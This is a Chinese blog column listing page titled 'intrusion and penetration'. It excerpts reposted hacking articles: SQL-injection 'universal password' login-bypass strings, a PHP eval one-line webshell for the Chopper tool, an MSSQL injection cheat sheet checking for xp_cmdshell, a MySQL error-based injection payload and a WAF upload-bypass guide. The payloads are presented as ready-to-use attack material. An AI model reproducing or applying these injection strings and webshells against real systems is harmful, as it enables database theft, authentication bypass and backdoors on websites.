入侵渗透
justincom
这个作者很懒,什么都没留下…
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
asp、aspx、php、jsp万能密码大全
与其说是asp、aspx、php、jsp的万能密码还不如说是Access、Mssql、Mysql、Oracle的闭合代码了。 asp aspx万能密码 1:"or "a"="a 2: ')or('a'='a 3:or 1=1-- 4:'or 1=1-- 5:a'or' 1=1-- 6:"or 1=1-- 7:'or'a'='a 8:转载 2015-10-21 12:59:51 · 15873 阅读 · 0 评论 -
最短的各类一句话
FROM:http://zone.wooyun.org/content/23474 菜刀readme.txt中附带一3个一句话: PHP: <?php @eval($_POST['chopper']);?> ASP: ASP.NET: 抛弃密码的长度不算,其实这3个一句话均不是最短的。 如: PHP我们可以这样写: <?php @eval(转载 2015-10-20 15:56:35 · 1202 阅读 · 0 评论 -
MSSQL注射大全
总结一个比较全的MSSQL注射大全,要多玩玩手工,要不然会忘记的 From:http://www.cnblogs.com/aix1314/archive/2013/03/31/2991609.html sql注入语句大全 --是否存在xp_cmdshell and 1=(select count(*) from master.dbo.sysobjects where xtype =转载 2015-11-01 02:26:34 · 1613 阅读 · 0 评论 -
mysql报错注入(显错注入)整理
1、通过floor暴错 /*数据库版本*/ and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_s转载 2015-11-02 20:55:41 · 1885 阅读 · 1 评论 -
我的WafBypass之道(upload篇)
好文章,值得转载:https://xianzhi.aliyun.com/forum/read/458.html 0x00 前言 玩waf当然也要讲究循序渐进,姊妹篇就写文件上传好了,感觉也就SQLi和Xss的WafBypass最体现发散性思维的,而文件上传、免杀、权限提升这几点的Bypass更需要的是实战的经验。本文内容为沉淀下来的总结以及一些经典案例。想到哪写到哪,所转载 2016-12-03 23:49:23 · 2586 阅读 · 0 评论
分享